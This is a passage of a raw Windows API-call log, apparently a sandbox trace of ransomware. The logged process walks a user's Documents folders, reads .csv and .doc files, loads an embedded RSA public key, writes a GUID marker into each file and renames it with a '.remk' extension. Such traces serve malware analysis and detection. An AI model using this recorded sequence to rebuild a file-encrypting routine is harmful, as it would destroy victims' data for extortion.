RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15520) returned 0x37c6278 [0236.008] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d268 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d2b0 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.009] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0236.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0236.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc618 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc600 [0236.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.010] GetCurrentThreadId () returned 0x314 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5250 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.011] GetCurrentThreadId () returned 0x314 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.012] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15521, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.012] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.012] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.013] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.013] CloseHandle (hObject=0x640) returned 1 [0236.015] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\vES6q7o6drzmc2wswqv.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\ves6q7o6drzmc2wswqv.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\vES6q7o6drzmc2wswqv.csv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\ves6q7o6drzmc2wswqv.csv.remk")) returned 1 [0236.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.016] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.018] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec24920, ftCreationTime.dwHighDateTime=0x1d5d8bf, ftLastAccessTime.dwLowDateTime=0x9cadd830, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0x9cadd830, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x15521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vES6q7o6drzmc2wswqv.csv", cAlternateFileName="VES6Q7~1.CSV")) returned 0 [0236.018] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0236.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186060 | out: hHeap=0x630000) returned 1 [0236.018] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.018] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\") returned="t648 Z2T0mST-97jBqS\\" [0236.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\") returned="eBkpfXutqqrq6h\\" [0236.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\") returned="X0h6NwRPaRX5m\\" [0236.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0236.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.019] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.019] PathFindFileNameW (pszPath="") returned="" [0236.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6293df10, ftCreationTime.dwHighDateTime=0x1d5dff4, ftLastAccessTime.dwLowDateTime=0xe978010, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xe978010, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0236.022] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6293df10, ftCreationTime.dwHighDateTime=0x1d5dff4, ftLastAccessTime.dwLowDateTime=0xe978010, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xe978010, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.022] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec56e9d0, ftCreationTime.dwHighDateTime=0x1d5e770, ftLastAccessTime.dwLowDateTime=0x898a8ae0, ftLastAccessTime.dwHighDateTime=0x1d5e4fb, ftLastWriteTime.dwLowDateTime=0x898a8ae0, ftLastWriteTime.dwHighDateTime=0x1d5e4fb, nFileSizeHigh=0x0, nFileSizeLow=0x1102c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Usub D99LlYwn35U.doc", cAlternateFileName="1USUBD~1.DOC")) returned 1 [0236.022] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\1Usub D99LlYwn35U.doc") returned=".doc" [0236.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\1Usub D99LlYwn35U.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\1usub d99llywn35u.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.025] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=69676) returned 1 [0236.025] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.028] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11006, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.028] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.030] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1102c, lpOverlapped=0x0) returned 1 [0236.031] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.031] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.032] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.033] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.033] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.033] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.033] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.033] GetLastError () returned 0x0 [0236.033] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.033] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.033] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.033] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.033] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11030) returned 0x37c6278 [0236.034] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d2b0 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d2f8 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0236.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.035] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0236.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0236.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc630 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc618 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.036] GetCurrentThreadId () returned 0x314 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c52e0 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.037] GetCurrentThreadId () returned 0x314 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.037] RtlAllocateHeap 